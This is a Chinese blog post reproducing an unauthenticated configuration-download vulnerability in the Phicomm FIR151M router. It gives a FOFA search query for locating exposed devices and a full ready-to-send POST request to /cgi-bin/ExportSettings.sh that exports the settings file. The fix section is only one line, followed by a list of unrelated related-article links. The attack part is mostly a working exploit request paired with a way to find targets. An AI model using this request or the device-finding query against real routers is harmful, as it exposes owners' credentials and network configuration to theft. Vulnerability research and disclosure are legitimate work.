当前位置: 首页 > news >正文

【漏洞复现】斐讯FIR151M路由器未授权下载漏洞

news 2025/7/27 4:55:47

Nx01 产品简介

        斐讯数据通信技术有限公司成立于2009年,是为用户提供智慧家庭领域智能产品和云服务的科技创新性企业。

Nx02 漏洞描述

        斐讯 FIR151M路由器配置文件未授权下载漏洞,攻击者可利用该漏洞获取敏感信息。

Nx03 产品主页

fofa-query: app="PHICOMM-FIR151M"

Nx04 漏洞复现

POC:

POST /cgi-bin/ExportSettings.sh HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 25
Host: {{Hostname}}
Pragma: no-cache
Connection: closeExport=%E5%A4%87%E4%BB%BD

Nx05 修复建议

建议联系软件厂商进行处理。

http://www.lryc.cn/news/295428.html

相关文章:

  • 【SpringBoot】application配置(5)
  • Linux安全技术与iptables防火墙
  • QT QCombox 样式表 比起作用
  • 在 Windows 10 上使用 Visual Studio 2022 进行 C++ 桌面开发
  • 如何安装x11vnc并结合cpolar实现win远程桌面Deepin
  • C++基础入门Day1
  • 【高质量精品】2024美赛A题22页word版成品论文+数据+多版本前三问代码及代码讲解+前四问思路模型等(后续会更新)
  • Spark context stopped while waiting for backend
  • 保研机试算法训练个人记录笔记(三)
  • 2月6日作业
  • rust给py写拓展如此简单
  • 白嫖10款游戏加速器,一年都不用开会员!
  • Kafka SASL_SSL双重认证
  • css新手教程
  • spring boot(2.4.x之前版本)和spring cloud项目中配置文件的作用
  • web前后端小坑记录
  • 股票K线简介
  • 路由器、路由器的构成、交换结构
  • 【Mysql】整理
  • 项目02《游戏-08-开发》Unity3D
  • 【数据库原理及应用】简答题归纳总结
  • 通过无线打通两个路由器
  • idea 配置文件,中文出现乱码如何解决
  • 网络协议梳理
  • 14. 【Linux教程】文件压缩与解压
  • ruoyi-nbcio中xxl-job的安装与使用
  • 从零学算法162
  • 5.0 ZooKeeper 数据模型 znode 结构详解
  • 《数电》理论笔记-第1章-逻辑代数基础
  • 计算指定路径下的可用空间大小